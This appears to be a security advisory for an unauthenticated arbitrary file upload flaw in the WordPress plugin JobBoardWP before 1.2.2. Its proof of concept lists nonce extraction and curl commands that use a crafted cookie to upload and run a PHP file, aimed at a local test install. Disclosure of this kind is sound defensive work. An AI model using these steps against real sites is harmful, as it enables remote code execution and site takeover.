JobBoardWP < 1.2.2 - Unauthenticated Arbitrary File Upload

The plugin does not properly validate file names and types in its file upload functionalities, allowing unauthenticated users to upload arbitrary files such as PHP.

PoC

Setup: 1. Install the vulnerable plugin (jobboardwp version 1.2.1) 2. In the toast message that appears on the plugin’s installation page, create the required pages for the plugin to work properly Attack: 1. As an unauthenticated user, extract the nonce from the “Jobs” page (by default /?page_id=5), CTRL+F for “jb_front_data” 2. Prepare a payload you want to upload, ensure that the filename ends with “.png”: echo ‘’ > /tmp/payload.png 3. Invoke the following curl command, with the nonce embedded, to upload the payload: curl ‘http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=jb-upload-company-logo’ \ -H ‘Cookie: jb-logo-upload=payload.php’ \ -F ‘nonce=’ \ -F ‘chunks=1’ \ -F ‘file=@/tmp/payload.png’ \ 4. Trigger the payload by accessing it (the location of the payload is returned by the curl command above): curl ‘http://127.0.0.1:7777/wp-content/uploads/jobboardwp/temp/payload.php’